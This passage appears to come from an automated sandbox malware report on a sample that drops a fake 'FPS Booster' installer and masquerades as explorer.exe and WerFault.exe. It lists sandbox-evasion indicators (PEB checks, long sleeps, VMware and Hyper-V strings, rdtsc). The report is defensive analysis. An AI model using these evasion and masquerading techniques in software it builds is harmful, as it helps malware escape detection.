                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-249
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeMemory allocated: EF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeMemory allocated: 2A40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeMemory allocated: 1200000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeMemory allocated: 1AB80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeMemory allocated: C90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeMemory allocated: 1A630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\regedit\explorer.exeMemory allocated: FC0000 memory reserve | memory write watch
                    Source: C:\Windows\regedit\explorer.exeMemory allocated: 1ACD0000 memory reserve | memory write watch
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeMemory allocated: 1080000 memory reserve | memory write watch
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeMemory allocated: 1AE70000 memory reserve | memory write watch
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeMemory allocated: CC0000 memory reserve | memory write watch
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeMemory allocated: 1A7C0000 memory reserve | memory write watch
                    Source: C:\Windows\regedit\explorer.exeMemory allocated: 8C0000 memory reserve | memory write watch
                    Source: C:\Windows\regedit\explorer.exeMemory allocated: 1A390000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 2_2_004012D9 rdtsc 2_2_004012D9
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 599889Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 599321Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 600000
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 599874
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 599765
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 599656
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 599547
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 600000
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599890
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599781
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599672
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599562
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599453
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599343
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeWindow / User API: threadDelayed 558Jump to behavior
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeWindow / User API: threadDelayed 675
                    Source: C:\Windows\regedit\explorer.exeWindow / User API: threadDelayed 1195
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss20C1.tmp\System.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe TID: 7276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7888Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7888Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7888Thread sleep time: -599889s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7892Thread sleep count: 558 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7888Thread sleep time: -599781s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7888Thread sleep time: -599672s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7888Thread sleep time: -599321s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7716Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7628Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\regedit\explorer.exe TID: 7780Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 7784Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8120Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8120Thread sleep time: -600000s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8128Thread sleep count: 122 > 30
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8120Thread sleep time: -599874s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8128Thread sleep count: 675 > 30
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8120Thread sleep time: -599765s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8120Thread sleep time: -599656s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8120Thread sleep time: -599547s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8068Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -599890s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 1544Thread sleep count: 1195 > 30
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -599781s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -599672s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -599562s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -599453s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -599343s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 1096Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\regedit\explorer.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\regedit\explorer.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_00406301 FindFirstFileW,FindClose,7_2_00406301
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406CC7
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 0_2_00F3CB04 GetSystemInfo,0_2_00F3CB04
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 599889Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 599321Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 600000
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 599874
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 599765
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 599656
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 599547
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 600000
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599890
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599781
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599672
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599562
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599453
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599343
                    Source: savesbrokerDriverSavesbroker.exe, 00000005.00000002.1401719918.000000001BBB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 018 VMware, Inc.X.
                    Source: Amcache.hve.6.drBinary or memory string: VMware
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: explorer.exe.5.drBinary or memory string: 1998-2018 VMware, Inc.X.
                    Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: WerFault.exe, 00000011.00000002.1428428832.000000001B300000.00000004.00000020.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1525200074.000000001B600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: explorer.exe, 0000001B.00000002.1783183065.000000001B082000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
                    Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                    Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeAPI call chain: ExitProcess graph end nodegraph_2-199
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeAPI call chain: ExitProcess graph end nodegraph_2-226
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeAPI call chain: ExitProcess graph end nodegraph_2-251
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeAPI call chain: ExitProcess graph end nodegraph_2-254
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeAPI call chain: ExitProcess graph end nodegraph_2-167
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeAPI call chain: ExitProcess graph end nodegraph_7-5250
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 2_2_004012D9 rdtsc 2_2_004012D9
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 0_2_00F3EE30 LdrInitializeThunk,0_2_00F3EE30
